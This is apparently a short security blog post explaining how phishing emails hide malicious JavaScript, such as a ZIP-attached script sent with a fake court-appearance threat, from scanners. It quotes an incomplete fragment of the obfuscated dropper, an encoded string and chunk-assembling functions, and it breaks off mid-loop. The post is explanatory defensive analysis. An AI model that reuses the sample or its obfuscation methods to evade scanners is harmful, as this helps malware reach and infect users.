Why You Still Receive Phishing Emails and Malware: Scrambling The Code

Malware can use scrambled JavaScript to trick scanners. In this example we have an email with a ZIP attachment. The initial email tries to panic the user with the threat of a court appearance:

So when we open the ZIP file, it’s a JavaScript file:

Basically this a scrambled JavaScript file which hides the actual JavaScript code. It uses standard obfuscation methods, such as deleting newlines, splitting the JavaScript into small chunks, and randomising the order of the printing of the JavaScript.

Overall it calls a number of functions in order with:

var stroke="5557545E171114140B1610240A0110130B160F170D09174A070B09";
function stkg179() { vmy('un(fn'); return gj(); };  
function stkg231() { vmy('(681'); return gj(); };  
function stkg93() { vmy('veXOb'); return gj(); };  
function stkg118() { vmy(' x'); return gj(); };  
function stkg71() { vmy('h.'); return gj(); };
for (var pcrs=1; pcrs<=237…